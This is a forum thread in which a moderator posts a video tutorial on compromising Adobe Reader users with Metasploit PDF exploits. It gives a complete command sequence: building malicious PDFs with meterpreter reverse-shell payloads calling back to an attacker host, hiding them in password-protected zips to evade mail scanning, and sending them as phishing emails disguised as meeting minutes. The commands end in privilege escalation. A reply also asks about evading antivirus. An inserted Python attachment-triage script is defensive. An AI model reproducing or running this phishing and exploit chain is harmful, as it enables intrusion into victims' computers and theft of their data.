
Thread: [Video] Metasploit Vs. Adobe PDFs

  1. #1
    g0tmi1k (Moderator)
    Join Date: Feb 2010
    Posts: 1,771

    [Video] Metasploit Vs. Adobe PDFs

    Links
    Watch video on-line: http://g0tmi1k.blip.tv/file/4924026
    Download video:
    http://www.mediafire.com/?h7lab2h1p1369id


    Brief Overview
    This screencast demonstrates vulnerabilities in Adobe PDF Reader. Instead of creating a mass of vulnerable files, the attacker creates two PDFs (one relies on no user interaction and crashes the reader, whereas the other requires the user to click through a few warning screens but then presents them with a document).

    The attacker emails these documents to the target (however they have to compress & encrypt the documents).


    What do I need?
    * Metasploit – (Can be found on BackTrack 4-R2). Download here
    * SendEmail + SMTP details – (SendEmail can be found on BackTrack 4-R2). Download sendemail here
    * A PDF document (Either create your own or can be found by using an internet search engine).
    * The target will need a vulnerable version of Adobe Reader (v9.3 for example). Download here



    Method
    * Start network services and obtain an IP address
    * Run metasploit and search for PDF exploits
    * Configure exploit and create a vulnerable file
    * Compress and encrypt PDF
    * Socially engineer an email to the target and attach file
    * Wait for target to download and open file
    * Game Over
    * Locate a "legit" PDF document and bind with exploit
    * Compress and encrypt PDF document
    * Socially engineer an email to the target and attach file
    * Wait for target to download and open file
    * Game Over ...again


    Commands: *Due to the forum's security, I'm unable to post the complete command list.*
    Code:
    start-network
    dhclient eth0
    
    msfconsole
    search pdf
    use windows/fileformat/adobe_libtiff
    info
    show options
    set FILENAME evil.pdf
    setg OUTPUTPATH /root
    setg PAYLOAD windows/meterpreter/reverse_tcp
    setg LHOST 192.168.0.33
    setg LPORT 4444
    show options
    exploit
    use exploit/multi/handler
    show options
    exploit
    
    # First try: a plain zip. The SMTP server rejected the PDF attachment (see walk-through).
    zip meeting.zip evil.pdf
    sendEmail -f "*************************************" -t ***************************** -u "Top secret stuff" -m "Here are the minutes from the last meeting." -a /root/meeting.zip -s [smtp host] -xu [smtp user] -xp [smtp pass] 
    # Second try: password-protect the zip so the attachment cannot be inspected in transit.
    # zip -e prompts for the password twice; the two lines after it are the password (g0tmi1k).
    zip -e meeting.zip evil.pdf
    g0tmi1k
    g0tmi1k
    sendEmail -f "*************************************" -t ***************************** -u "Top secret stuff" -m "Here are the minutes from the last meeting. The password is: g0tmi1k" -a /root/meeting.zip -s [smtp host] -xu [smtp user] -xp [smtp pass] 
    
    #Firefox -> Google-> filetype:PDF magic ponies -> Save: good.pdf
    
    #IE -> [target's online email] -> Login -> Download FatPlayer -> Download & Open
    
    use windows/fileformat/adobe_pdf_embedded_exe
    info
    show options
    set FILENAME evil2.pdf
    #set EXENAME evil.exe   #ENCODE 
    set LAUNCH_MESSAGE Be sure to re-save when shown and then click open.  
    set INFILENAME /root/good.pdf
    show options
    exploit
    use exploit/multi/handler
    show options
    exploit -j
    
    # Password-protect the second PDF the same way (password prompt answered twice)
    zip -e meeting2.zip evil2.pdf
    g0tmi1k
    g0tmi1k
    sendEmail -f "*************************************" -t ***************************** -u "Top secret stuff v2" -m "If you can't open the first email, try this one.  The password is: g0tmi1k" -a /root/meeting2.zip  -s [smtp host] -xu [smtp user] -xp [smtp pass] 
    
    #IE -> [target's online email] -> Login -> Download FatPlayer -> Download & Open
    
    sessions -l -v
    sessions -i 2
    sysinfo
    getuid
    getsystem
    getuid

    Walk-through
    The attacker approaches this attack similar to a previous method; however, instead of producing a collection of different files which are not going to be used, they choose to use a program which is very commonly installed (and also not updated often!), Adobe Reader.

    To start things going, the attacker starts their network connection and runs Metasploit. When Metasploit is ready, they search its database for known exploits for PDF files. "windows/fileformat/adobe_libtiff" has the latest disclosure date (2010-02-16) as of today's date (2011-03-22). After choosing it and looking at the exploit in more detail, the attacker notes the vulnerable versions of Adobe Reader (versions 8.0 - 8.2, 9.0 - 9.3) which the target HAS to have for this exploit to work.

    The attacker then proceeds to enter all the necessary information for the exploit to function, then creates the exploit when it is ready.

    Like before, the attacker chooses to socially engineer the target by sending them an email; however, this time around they want to attach the file instead of linking to it.
    The attacker enters a brief description of what the PDF is meant to contain. However, when the attacker tries to send the PDF, the SMTP server disallows the PDF attachment. The attacker compresses and encrypts the PDF, which will prevent detection (the attacker alters the original message to include the password).


    The attacker can sit back and relax until the target opens the PDF document... which the target does =). However! When the target opens the PDF document, the reader "crashes" before they can read the document. So they email back saying they are unable to read it. The attacker then replies with the "correct" PDF...

    This time, the attacker wants to "bind" an exploit to the "legit" PDF. So after searching Metasploit's database, they locate "windows/fileformat/adobe_pdf_embedded_exe".

    Again, the attacker then proceeds to enter all the necessary information for the exploit to function, creates the new document and delivers it using the same method as before. Just like before, there is nothing left for the attacker to do except to wait for the target to open the document...

    After the target has refreshed their inbox, they notice they have got the "correct" PDF. Upon opening the file, a "Save as" window pops up (1), and of course they wish to save the PDF or just want to read the document, so they just click next... After reading the message (2), they click on "open". After doing those steps the target is able to read the document...

    ...meanwhile the exploit has worked and the attacker has another meterpreter shell on the target's machine.


    (1) This is really a meterpreter agent, NOT the PDF file which it says it was. It has cloned the filename from the PDF the attacker used
    (2) The message is what the attacker left



    Notes:
    * You will need to find/use your own SMTP details.
    * Avast anti-virus detected the PDFs (2011-03-23), other Anti-Virus may as well.
    Song: New Zealand Shapeshifter - The Touch (Netsky remix) & New Zealand Shapeshifter - Lifetime (Logistics remix)
    Video length: 9:07
    Capture length: 32:22
    Blog Post: http://g0tmi1k.blogspot.com/2011/03/video-metasploit-vs-adobe-pdfs.html
    Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/39001-%5Bvideo%5D-metasploit-vs-adobe-pdfs.html#post192420
    Last edited by g0tmi1k; 03-27-2011 at 07:53 PM.
    Have you...g0tmi1k?
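The delivery chain in the post above (an exploit PDF, then a password-protected zip because the SMTP server refused the bare attachment) is also the part a defender can check for at the mail gateway. What follows is an added example, not code from the video or the post: a Python attachment triage that flags PDFs carrying /Launch or /EmbeddedFile objects (the pair an embedded-executable PDF such as the adobe_pdf_embedded_exe output relies on) and refuses to pass any zip whose entries have the encryption flag set, since nothing inside it can be scanned. The sample PDFs and archives are constructed inline, and the function names and the allow/review/block/quarantine verdicts are this example's own.

```python
"""Attachment triage for the delivery chain above (a PDF carrying /Launch and
/EmbeddedFile objects inside a password-protected zip). Added example, not code
from the post; every sample PDF and archive below is constructed inline."""
import io
import re
import struct
import zipfile
import zlib

# /Launch plus /EmbeddedFile is the pair an embedded-executable PDF (the
# adobe_pdf_embedded_exe technique) needs; the rest are generic auto-run hooks.
SUSPICIOUS_KEYS = (b"/Launch", b"/EmbeddedFile", b"/OpenAction", b"/AA",
                   b"/JavaScript", b"/JS", b"/RichMedia")
HIGH_RISK = {"/Launch", "/EmbeddedFile", "/JavaScript", "/JS", "/RichMedia"}
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\nendstream", re.DOTALL)
LOCAL_HDR = struct.Struct("<4sHHHHHIIIHH")  # 30-byte zip local file header
ZIP_ENCRYPTED = 0x0001                      # general-purpose flag, bit 0

def inflate_streams(pdf: bytes) -> bytes:
    """PDF bytes plus every inflated Flate stream, so hidden keywords show up."""
    inflated = []
    for m in STREAM_RE.finditer(pdf):
        try:  # decompressobj tolerates a trailing CR before 'endstream'
            inflated.append(zlib.decompressobj().decompress(m.group(1)))
        except zlib.error:
            pass  # raw or image stream, not Flate-compressed
    return b"\n".join([pdf, *inflated])

def scan_pdf(pdf: bytes) -> dict:
    """Map each suspicious key present (inflated streams included) to its count."""
    if not pdf.startswith(b"%PDF"):
        raise ValueError("not a PDF")
    data = inflate_streams(pdf)
    return {k.decode(): data.count(k) for k in SUSPICIOUS_KEYS if k in data}

def zip_entries(blob: bytes) -> list:
    """Walk local file headers directly: (name, encrypted, csize) per entry."""
    entries, pos = [], 0
    while True:
        pos = blob.find(b"PK\x03\x04", pos)
        if pos < 0:
            return entries
        hdr = LOCAL_HDR.unpack_from(blob, pos)
        flags, csize, nlen, xlen = hdr[2], hdr[7], hdr[9], hdr[10]
        name = blob[pos + 30:pos + 30 + nlen].decode("cp437", "replace")
        entries.append((name, bool(flags & ZIP_ENCRYPTED), csize))
        pos += 30 + nlen + xlen + csize

def verdict(findings: dict) -> str:
    keys = {k for hits in findings.values() for k in hits}
    if keys & HIGH_RISK:
        return "block"
    return "review" if keys else "allow"

def triage_attachment(name: str, blob: bytes) -> dict:
    """Gateway decision for one attachment: allow / review / block / quarantine."""
    if blob.startswith(b"PK\x03\x04"):
        entries = zip_entries(blob)
        if any(enc for _, enc, _ in entries):
            # The `zip -e` trick from the post: nothing inside can be scanned,
            # so "cannot inspect" is treated as hostile rather than as unknown.
            return {"action": "quarantine", "reason": "password-protected zip",
                    "entries": [n for n, _, _ in entries]}
        findings = {}
        with zipfile.ZipFile(io.BytesIO(blob)) as zf:
            for zi in zf.infolist():
                data = zf.read(zi)
                if data.startswith(b"%PDF"):
                    findings[zi.filename] = scan_pdf(data)
        return {"action": verdict(findings), "findings": findings}
    if blob.startswith(b"%PDF"):
        findings = {name: scan_pdf(blob)}
        return {"action": verdict(findings), "findings": findings}
    return {"action": "review", "reason": "unrecognised attachment type"}

def make_zip(files: dict, encrypted: bool = False) -> bytes:
    """Constructed sample archive. zipfile cannot write password-protected zips,
    so 'encrypted' just sets the flag bit the gateway check keys on."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for fname, data in files.items():
            zf.writestr(fname, data)
    blob = bytearray(buf.getvalue())
    if encrypted:
        for sig, off in ((b"PK\x03\x04", 6), (b"PK\x01\x02", 8)):
            pos = blob.find(sig)
            while pos >= 0:
                blob[pos + off] |= ZIP_ENCRYPTED
                pos = blob.find(sig, pos + len(sig))
    return bytes(blob)

# Constructed samples: a bare benign PDF, and one whose catalog auto-runs a
# /Launch action while the /EmbeddedFile object hides inside a Flate stream.
BENIGN_PDF = (b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
              b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
              b"trailer << /Root 1 0 R >>\n%%EOF\n")
_hidden = zlib.compress(b"<< /Type /EmbeddedFile /Length 0 >>")
_stream_obj = (b"4 0 obj << /Filter /FlateDecode /Length %d >>\nstream\n" % len(_hidden)
               + _hidden + b"\nendstream\nendobj\n")
LAUNCH_PDF = (b"%PDF-1.4\n1 0 obj << /Type /Catalog /OpenAction 3 0 R >> endobj\n"
              b"3 0 obj << /S /Launch /Win << /F (payload.exe) >> >> endobj\n"
              + _stream_obj + b"trailer << /Root 1 0 R >>\n%%EOF\n")
```

Running `triage_attachment("meeting.zip", make_zip({"evil.pdf": LAUNCH_PDF}, encrypted=True))` returns a quarantine verdict without ever opening the archive, while the same PDF in an unprotected zip is blocked on its /Launch and /EmbeddedFile objects. The keyword scan would not catch the libtiff PDF from the first half of the video (that one is a malformed image stream rather than an action object), which is why the encrypted-archive rule carries more weight than the PDF rule: a gateway cannot apply any content check to a file it cannot open, so "uninspectable" has to be a decision in itself.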

  2. #2
    zimmaro (Good friend of the forums)
    Join Date: Mar 2010
    Location: milano
    Posts: 407

    Re: [Video] Metasploit Vs. Adobe PDFs

    many,many,many thanks for your JOBS!

  3. #3
    NeoGeo (Just burned his ISO)
    Join Date: Mar 2011
    Posts: 1

    Re: [Video] Metasploit Vs. Adobe PDFs

    Absolutely Fantastic Video.

  4. #4
    m0j4h3d (Member)
    Join Date: Jan 2010
    Posts: 84

    Re: [Video] Metasploit Vs. Adobe PDFs

    nice video man, gd work, but we gotta find a new way for avoiding AV from catching the .pdf file ,,, btw useful video and nice ideas
    go fw
    ---> 3v3RY D4y P4ss3S 1 f0uNd N3W th1NGs <---
    Knowing how 2 use BT dsnt mean that u r hacker

  5. #5
    g0tmi1k (Moderator)
    Join Date: Feb 2010
    Posts: 1,771

    Re: [Video] Metasploit Vs. Adobe PDFs

    Quote Originally Posted by zimmaro View Post
    many,many,many thanks for your JOBS!
    Quote Originally Posted by NeoGeo View Post
    Absolutely Fantastic Video.
    Thanks for the thanks =)


    Quote Originally Posted by m0j4h3d View Post
    nice video man, gd work, but we gotta find a new way for avoiding AV from catching the .pdf file ,,, btw useful video and nice ideas
    go fw
    It's on my todo list - however I want to finish doing "Owning OSs" before I start on bypassing security protection
    Cheers for the feedback!
    Have you...g0tmi1k?

  6. #6
    voidnecron (Senior Member)
    Join Date: May 2010
    Posts: 132

    Re: [Video] Metasploit Vs. Adobe PDFs

    Great stuff again from the video tutorial master
    "The difference between RAID1 and RAID0 is that the zero stands for how many files you're gonna have after a harddisk failure."
